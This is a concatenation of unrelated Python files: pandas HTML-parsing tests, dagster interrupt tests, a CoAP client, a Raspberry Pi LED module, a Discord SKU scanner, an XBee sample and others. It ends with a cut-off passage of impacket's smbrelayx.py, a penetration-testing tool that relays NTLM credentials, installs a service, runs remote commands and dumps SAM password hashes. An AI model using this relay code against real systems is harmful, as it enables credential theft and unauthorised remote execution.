<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
myLed.py
|
import threading
import gpiozero
import myUtil
import time
import random
import mySerial
from myLog import log, elog, slog
HIGH = 1 # we can't use anything lower or a clear flickering will show. We can't use PiGPIO (which supports HW PWM), because it will interfere with the Amp.
LOW = 0.5
OFF = 0
def getValue():
myDict = mySerial.getDict()
if not myDict or not "On" in myDict or myDict["On"] != 1:
return OFF
tuneFactor = mySerial.getTuneFactor()
if tuneFactor == None:
return LOW
elif tuneFactor > 0.99:
# radio is perfectly tuned
return HIGH
elif tuneFactor < 0.01:
# radio is totally out of tune
return LOW
else:
# radio is badly tuned: make the LED flicker
oddity = tuneFactor*0.65 + 0.1
if random.random() <= oddity:
return HIGH
else:
return LOW
lastValues = []
def thread_run():
global lastValues
while True:
value = getValue()
# keep track of last values to give the feel that the light is actually a coil-based light.
lastValues = lastValues[0:3]
lastValues.insert(0, value)
value = sum(lastValues) / len(lastValues)
value *= value # adapt for non-linear dim of LEDs
led.value = value
time.sleep(1 / 25)
try:
led = gpiozero.PWMLED(myUtil.ledPin)
thread = threading.Thread(target=thread_run, daemon=True)
thread.name = "led"
thread.start()
except gpiozero.exc.BadPinFactory as e:
elog("LED GPIO could not be initialized. You are probably not running on a RasPi, so we disable the LED feature.")
|
test_interrupt.py
|
import os
import signal
import tempfile
import time
from threading import Thread
import pytest
from dagster import (
DagsterEventType,
Field,
ModeDefinition,
String,
execute_pipeline_iterator,
pipeline,
reconstructable,
resource,
seven,
solid,
)
from dagster.core.errors import DagsterExecutionInterruptedError, raise_execution_interrupts
from dagster.core.test_utils import instance_for_test_tempdir
from dagster.utils import safe_tempfile_path, send_interrupt
from dagster.utils.interrupts import capture_interrupts, check_captured_interrupt
def _send_kbd_int(temp_files):
while not all([os.path.exists(temp_file) for temp_file in temp_files]):
time.sleep(0.1)
send_interrupt()
@solid(config_schema={"tempfile": Field(String)})
def write_a_file(context):
with open(context.solid_config["tempfile"], "w") as ff:
ff.write("yup")
start_time = time.time()
while (time.time() - start_time) < 30:
time.sleep(0.1)
raise Exception("Timed out")
@solid
def should_not_start(_context):
assert False
@pipeline
def write_files_pipeline():
write_a_file.alias("write_1")()
write_a_file.alias("write_2")()
write_a_file.alias("write_3")()
write_a_file.alias("write_4")()
should_not_start.alias("x_should_not_start")()
should_not_start.alias("y_should_not_start")()
should_not_start.alias("z_should_not_start")()
def test_single_proc_interrupt():
@pipeline
def write_a_file_pipeline():
write_a_file()
with safe_tempfile_path() as success_tempfile:
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
result_types = []
result_messages = []
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={"solids": {"write_a_file": {"config": {"tempfile": success_tempfile}}}},
):
result_types.append(result.event_type)
result_messages.append(result.message)
assert DagsterEventType.STEP_FAILURE in result_types
assert DagsterEventType.PIPELINE_FAILURE in result_types
assert any(
[
"Execution was interrupted unexpectedly. "
"No user initiated termination request was found, treating as failure." in message
for message in result_messages
]
)
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_interrupt_multiproc():
with tempfile.TemporaryDirectory() as tempdir:
with instance_for_test_tempdir(tempdir) as instance:
file_1 = os.path.join(tempdir, "file_1")
file_2 = os.path.join(tempdir, "file_2")
file_3 = os.path.join(tempdir, "file_3")
file_4 = os.path.join(tempdir, "file_4")
# launch a thread that waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([file_1, file_2, file_3, file_4],)).start()
results = []
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
reconstructable(write_files_pipeline),
run_config={
"solids": {
"write_1": {"config": {"tempfile": file_1}},
"write_2": {"config": {"tempfile": file_2}},
"write_3": {"config": {"tempfile": file_3}},
"write_4": {"config": {"tempfile": file_4}},
},
"execution": {"multiprocess": {"config": {"max_concurrent": 4}}},
"intermediate_storage": {"filesystem": {}},
},
instance=instance,
):
results.append(result)
assert [result.event_type for result in results].count(
DagsterEventType.STEP_FAILURE
) == 4
assert DagsterEventType.PIPELINE_FAILURE in [result.event_type for result in results]
def test_interrupt_resource_teardown():
called = []
cleaned = []
@resource
def resource_a(_):
try:
called.append("A")
yield "A"
finally:
cleaned.append("A")
@solid(config_schema={"tempfile": Field(String)}, required_resource_keys={"a"})
def write_a_file_resource_solid(context):
with open(context.solid_config["tempfile"], "w") as ff:
ff.write("yup")
while True:
time.sleep(0.1)
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def write_a_file_pipeline():
write_a_file_resource_solid()
with safe_tempfile_path() as success_tempfile:
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
results = []
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send an interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={
"solids": {
"write_a_file_resource_solid": {"config": {"tempfile": success_tempfile}}
}
},
):
results.append(result.event_type)
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
assert "A" in cleaned
def _send_interrupt_to_self():
os.kill(os.getpid(), signal.SIGINT)
start_time = time.time()
while not check_captured_interrupt():
time.sleep(1)
if time.time() - start_time > 15:
raise Exception("Timed out waiting for interrupt to be received")
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_capture_interrupt():
outer_interrupt = False
inner_interrupt = False
with capture_interrupts():
try:
_send_interrupt_to_self()
except: # pylint: disable=bare-except
inner_interrupt = True
assert not inner_interrupt
# Verify standard interrupt handler is restored
standard_interrupt = False
try:
_send_interrupt_to_self()
except KeyboardInterrupt:
standard_interrupt = True
assert standard_interrupt
outer_interrupt = False
inner_interrupt = False
# No exception if no signal thrown
try:
with capture_interrupts():
try:
time.sleep(5)
except: # pylint: disable=bare-except
inner_interrupt = True
except: # pylint: disable=bare-except
outer_interrupt = True
assert not outer_interrupt
assert not inner_interrupt
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_raise_execution_interrupts():
with raise_execution_interrupts():
try:
_send_interrupt_to_self()
except DagsterExecutionInterruptedError:
standard_interrupt = True
assert standard_interrupt
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_interrupt_inside_nested_delay_and_raise():
interrupt_inside_nested_raise = False
interrupt_after_delay = False
try:
with capture_interrupts():
with raise_execution_interrupts():
try:
_send_interrupt_to_self()
except DagsterExecutionInterruptedError:
interrupt_inside_nested_raise = True
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert interrupt_inside_nested_raise
assert not interrupt_after_delay
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_no_interrupt_after_nested_delay_and_raise():
interrupt_inside_nested_raise = False
interrupt_after_delay = False
try:
with capture_interrupts():
with raise_execution_interrupts():
try:
time.sleep(5)
except: # pylint: disable=bare-except
interrupt_inside_nested_raise = True
_send_interrupt_to_self()
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert not interrupt_inside_nested_raise
assert not interrupt_after_delay
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_calling_raise_execution_interrupts_also_raises_any_captured_interrupts():
interrupt_from_raise_execution_interrupts = False
interrupt_after_delay = False
try:
with capture_interrupts():
_send_interrupt_to_self()
try:
with raise_execution_interrupts():
pass
except DagsterExecutionInterruptedError:
interrupt_from_raise_execution_interrupts = True
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert interrupt_from_raise_execution_interrupts
assert not interrupt_after_delay
|
helperclient.py
|
import random
from multiprocessing import Queue
from queue import Empty
import threading
from coapthon.messages.message import Message
from coapthon import defines
from coapthon.client.coap import CoAP
from coapthon.messages.request import Request
from coapthon.utils import generate_random_token
import socket
__author__ = 'Giacomo Tanganelli'
class HelperClient(object):
"""
Helper Client class to perform requests to remote servers in a simplified way.
"""
def __init__(self, server, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize a client to perform request to a server.
:param server: the remote CoAP server
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
#self.server = server
# bug fix:check if host is a domain, if true, convert server domain into ip
server_ip = socket.getaddrinfo(server[0], None)[0][4][0]
if server_ip == server[0]:
self.server = server
else:
self.server = (server_ip, server[1])
port = random.randint(1, 65535)
print(" using port: ", port)
self.protocol = CoAP(self.server, port, self._wait_response, sock=sock,
cb_ignore_read_exception=cb_ignore_read_exception, cb_ignore_write_exception=cb_ignore_write_exception)
self.queue = Queue()
def _wait_response(self, message):
"""
Private function to get responses from the server.
:param message: the received message
"""
if message is None or message.code != defines.Codes.CONTINUE.number:
self.queue.put(message)
def stop(self):
"""
Stop the client.
"""
self.protocol.close()
self.queue.put(None)
def close(self):
"""
Close the client.
"""
self.stop()
def _thread_body(self, request, callback):
"""
Private function. Send a request, wait for response and call the callback function.
:param request: the request to send
:param callback: the callback function
"""
self.protocol.send_message(request)
while not self.protocol.stopped.isSet():
response = self.queue.get(block=True)
callback(response)
def cancel_observing(self, response, send_rst): # pragma: no cover
"""
Delete observing on the remote server.
:param response: the last received response
:param send_rst: if explicitly send RST message
:type send_rst: bool
"""
if send_rst:
message = Message()
message.destination = self.server
message.code = defines.Codes.EMPTY.number
message.type = defines.Types["RST"]
message.token = response.token
message.mid = response.mid
self.protocol.send_message(message)
self.stop()
def get(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.GET, path)
# request.token = generate_random_token(2)
request.token = generate_random_token(4)
for k, v in kwargs.items():
#print ("get", k,v)
if hasattr(request, k):
#print ("get : setting:", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def get_non(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request_non(defines.Codes.GET, path)
#request.token = generate_random_token(2)
for k, v in kwargs.items():
#print ("get_none", k,v)
if hasattr(request, k):
#print ("get_none", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def observe(self, path, callback, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET with observe on a certain path.
:param path: the path
:param callback: the callback function to invoke upon notifications
:param timeout: the timeout of the request
:return: the response to the observe request
"""
request = self.mk_request(defines.Codes.GET, path)
request.observe = 0
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def delete(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a DELETE on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.DELETE, path)
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def post(self, path, payload, callback=None, timeout=None, no_response=False, **kwargs): # pragma: no cover
"""
Perform a POST on a certain path.
:param path: the path
:param payload: the request payload
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.POST, path)
request.token = generate_random_token(2)
request.payload = payload
if no_response:
request.add_no_response()
request.type = defines.Types["NON"]
for k, v in kwargs.items():
print ("put : setting:", k,v)
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout, no_response=no_response)
def put(self, path, payload, callback=None, timeout=None, no_response=False, **kwargs): # pragma: no cover
"""
Perform a PUT on a certain path.
:param path: the path
:param payload: the request payload
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.PUT, path)
request.token = generate_random_token(4)
request.payload = payload
if no_response:
request.add_no_response()
request.type = defines.Types["NON"]
for k, v in kwargs.items():
#print ("put : trying :", k,v)
if hasattr(request, k):
#print ("put : setting:", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout, no_response=no_response)
def discover(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a Discover request on the server.
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
if path == None:
request = self.mk_request_non(defines.Codes.GET, "/oic/res")
else:
request = self.mk_request_non(defines.Codes.GET, path)
#print("discover: path:", path)
# request.token = generate_random_token(2)
request.token = generate_random_token(4)
print ("discover : path=", path)
print ("discover : token=", request.token)
for k, v in kwargs.items():
#print ("discover : has:", k,v)
if hasattr(request, k):
try:
#print ("discover : setting:", k,v)
setattr(request, k, v)
except:
pass
return self.send_request(request, callback, timeout)
def send_request(self, request, callback=None, timeout=None, no_response=False): # pragma: no cover
"""
Send a request to the remote server.
:param request: the request to send
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
if callback is not None:
thread = threading.Thread(target=self._thread_body, args=(request, callback))
thread.start()
else:
self.protocol.send_message(request)
if no_response:
return
try:
response = self.queue.get(block=True, timeout=timeout)
except Empty:
#if timeout is set
response = None
return response
def send_empty(self, empty): # pragma: no cover
"""
Send empty message.
:param empty: the empty message
"""
self.protocol.send_message(empty)
def mk_request(self, method, path):
"""
Create a request.
:param method: the CoAP method
:param path: the path of the request
:return: the request
"""
request = Request()
request.destination = self.server
request.code = method.number
request.uri_path = path
return request
def mk_request_non(self, method, path):
"""
Create a request.
:param method: the CoAP method
:param path: the path of the request
:return: the request
"""
request = Request()
request.destination = self.server
request.code = method.number
request.uri_path = path
request.type = defines.Types["NON"]
return request
# feature update : ping
def ping(self):
"""
send a CON empty message to server to trigger RST response (CoAP ping)
"""
empty = Request()
empty.destination = self.server
empty.type = 0
self.send_empty(empty)
|
info_controller.py
|
import threading
import time
from tkinter.constants import *
from pyphone import controllers
from pyphone.controllers.controller import Controller
class InfoController(Controller):
def __init__(self, panel):
super().__init__(panel)
self._update_thread = threading.Thread(target=self._update_worker, daemon=True)
self._update_thread.start()
def cleanup(self):
super().cleanup()
self._update_thread.join()
def _update_worker(self):
from pyphone.controllers import GammuController
while not self.stopped.isSet():
if self.panel_visible and controllers.get(GammuController).connected.isSet():
self._get_system_info()
self._get_connection_info()
self._get_battery_status()
time.sleep(5)
def _get_system_info(self):
from pyphone.controllers import GammuController
system_info = []
system_info_commands = [
"GetManufacturer",
"GetModel",
"GetFirmware",
"GetNetworkInfo",
"GetSecurityStatus",
"GetDisplayStatus",
"GetSMSStatus",
"GetCalendarStatus",
"GetFileSystemStatus",
"GetIMEI",
"GetOriginalIMEI",
"GetSIMIMSI",
"GetPPM"
]
def add_system_info(name, result, error, percents):
system_info.append((name, result if error is None else error))
for command in system_info_commands:
controllers.get(GammuController).enqueue_command(command, callback=add_system_info)
while len(system_info) < len(system_info_commands):
if self.stopped.wait(0.1):
return
for entry in self.panel.system_info_tree.get_children():
self.panel.system_info_tree.delete(entry)
for entry in system_info:
key = entry[0]
value = entry[1] if entry[1] is not None else ""
self.panel.system_info_tree.insert("", END, text=key, values=(value,))
def _get_connection_info(self):
from pyphone.controllers import GammuController
def set_connection_info(name, result, error, percents):
if not self.stopped.isSet():
signal_percent = int(result["SignalPercent"]) if error is None else 0
signal_strength = int(result["SignalStrength"]) if error is None else 0
self.panel.signal_status_bar.configure(value=signal_percent)
self.panel.signal_status_text.configure(text="{} dBm".format(signal_strength))
controllers.get(GammuController).enqueue_command("GetSignalQuality", callback=set_connection_info)
return
def _get_battery_status(self):
from pyphone.controllers import GammuController
def set_battery_status(name, result, error, percents):
if not self.stopped.isSet():
battery_percent = int(result["BatteryPercent"]) if error is None else 0
self.panel.battery_status_bar.configure(value=battery_percent)
self.panel.battery_status_text.configure(text="{} %".format(battery_percent))
controllers.get(GammuController).enqueue_command("GetBatteryCharge", callback=set_battery_status)
|
main.pyw
|
from threading import Thread, Event
from queue import Queue
from tkinter import Tk, ttk
from time import sleep as wait
from loggingFramework import Logger
import requests
import json
import sys
logger = Logger()
def handle_exception(etype, value, traceback):
logger.logException(value)
quit()
sys.excepthook = handle_exception
skuKey = "primary_sku_id"
logger.logInfo("Getting games list")
datajson = requests.get("https://discordapp.com/api/v6/applications/detectable").json()
logger.logInfo("Building Interface")
root = Tk()
root.title("Search Discord for games!")
root.geometry('400x250+1000+300')
lb0 = ttk.Label(root, text="{} games to check. Estimated time: {} minutes".format(len(datajson), round((len(datajson) * 1) / 60, 2)))
lb0.pack()
lb1 = ttk.Label(root, text="Checked {} out of {} games".format("0", len(datajson)))
lb1.pack()
lb2 = ttk.Label(root, text="Press Start to begin searching")
lb2.pack()
pb = ttk.Progressbar(root, maximum=len(datajson), mode="determinate")
pb.pack(expand=True)
info_queue = Queue()
info_event = Event()
term_event = Event()
s_term_event = Event()
def start():
logger.logInfo("Starting...")
global updateThread
global searchT
s_term_event.clear()
btn["state"] = "disabled"
root.title("Searching Discord for games...")
updateThread = Thread(target=updateGUI, args=(info_queue, info_event, term_event))
searchT = Thread(target=search, args=(info_queue, info_event, term_event, s_term_event))
updateThread.start()
wait(0.1)
searchT.start()
def cancelSearch():
btn["state"] = "normal"
root.title("Searching Discord for games... Cancelled")
s_term_event.set()
def updateGUI(in_queue, in_event, term_event_in):
logger.logInfo("[Update]: Starting...", True)
while True:
is_set = in_event.wait(10)
if is_set:
try:
lb0text = in_queue.get()
lb1text = in_queue.get()
lb2text = in_queue.get()
pbvalue = in_queue.get()
lb0.config(text = lb0text)
lb1.config(text = lb1text)
lb2.config(text = lb2text)
pb["value"] = pbvalue
in_event.clear()
except Exception as e:
logger.logException(e)
s_term_event.set()
term_event_in.set()
if term_event_in.is_set() is True:
logger.logInfo("[Update]: Terminating...", True)
return
def search(queue_out, event_out, term_event_out, term_event_in):
logger.logInfo("[Search]: Starting...", True)
maxItems = len(datajson)
cItem = 1
workingSKUS = []
SKUCount = 0
queue_out.put("Checked {} out of {} games".format("0", len(datajson)))
queue_out.put("Starting")
queue_out.put("Please wait...")
queue_out.put(0)
event_out.set()
#root.update()
wait(2)
for item in datajson:
try:
while True:
r = requests.get("https://discordapp.com/api/v6/store/published-listings/skus/{}".format(item[skuKey]))
if r.status_code == 404:
break
elif r.status_code == 200:
workingSKUS.append(item)
break
elif r.status_code == 429:
wait(10)
continue
else:
break
SKUCount += 1
except KeyError:
pass
except Exception as e:
logger.logException(e)
cItem += 1
while not queue_out.empty():
pass
queue_out.put("Checked {} out of {} games".format(cItem - 1, len(datajson)))
queue_out.put("Checking {}".format(item["name"]))
queue_out.put("{} SKU IDs have been checked and I've found {} working SKUs so far".format(SKUCount, len(workingSKUS)))
queue_out.put(cItem - 1)
event_out.set()
wait(1)
if term_event_in.is_set():
logger.logInfo("[Search]: Terminating...", True)
term_event_out.set()
return
listString = []
for item in workingSKUS:
listString.append("{} : https://discord.com/store/skus/{}".format(item["name"], item[skuKey]))
logger.logInfo("Writing to file...")
with open("output.txt", "w") as outputfile:
outputfile.write("\n".join(listString))
queue_out.put(lb0["text"])
queue_out.put("Completed! Please check the new output.txt file")
queue_out.put("Found {} working SKUs".format(len(workingSKUS)))
queue_out.put(pb["value"])
event_out.set()
term_event_out.set()
btn = ttk.Button(root, text="Start", command=start)
btn.pack()
cbtn = ttk.Button(root, text="Cancel", command=cancelSearch)
cbtn["state"] = "disabled"
cbtn.pack()
logger.logInfo("Interface built, starting main loop!")
root.mainloop()
|
main.py
|
# Copyright 2020, Digi International Inc.
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from digi.xbee.io import IOLine, IOMode
from digidevice import xbee
import time
import threading
REMOTE_NODE_ID = "REMOTE"
IOLINE_IN = IOLine.DIO1_AD1
def main():
print(" +-------------------------------------+")
print(" | XBee Gateway Read Remote ADC Sample |")
print(" +-------------------------------------+\n")
stop = False
th = None
local_device = xbee.get_device()
try:
local_device.open()
# Obtain the remote XBee device from the XBee network.
xbee_network = local_device.get_network()
remote_device = xbee_network.get_device_by_node_id(REMOTE_NODE_ID)
if not remote_device:
print("Device not found in the network, trying to discover it...")
remote_device = xbee_network.discover_device(REMOTE_NODE_ID)
if remote_device is None:
print("Could not discover the remote device")
exit(1)
remote_device.set_io_configuration(IOLINE_IN, IOMode.ADC)
def read_adc_task():
while not stop:
# Read the analog value from the remote input line.
value = remote_device.get_adc_value(IOLINE_IN)
print("%s: %d" % (IOLINE_IN, value))
time.sleep(0.2)
th = threading.Thread(target=read_adc_task)
time.sleep(0.5)
th.start()
input()
finally:
stop = True
if th:
th.join()
if local_device is not None and local_device.is_open():
local_device.close()
if __name__ == '__main__':
main()
|
smbrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the smbclient portion. It is supposed to be
# working on any LM Compatibility level. The only way to stop this attack
# is to enforce on the server SPN checks and or signing.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the targets succeed, the client authentication
# success as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
from __future__ import division
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import http.server
import socketserver
import argparse
import base64
import logging
import os
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from six import PY2
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Cryptodome.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
logging.critical("See https://pypi.org/project/pycryptodomex/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = b''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
logging.debug('Exception:', exc_info=True)
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = b''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print(self.__answerTMP.decode(CODEC))
except UnicodeDecodeError:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute smbrelayx.py '
'again with -codec and the corresponding codec')
print(self.__answerTMP)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.debug('Exception:', exc_info=True)
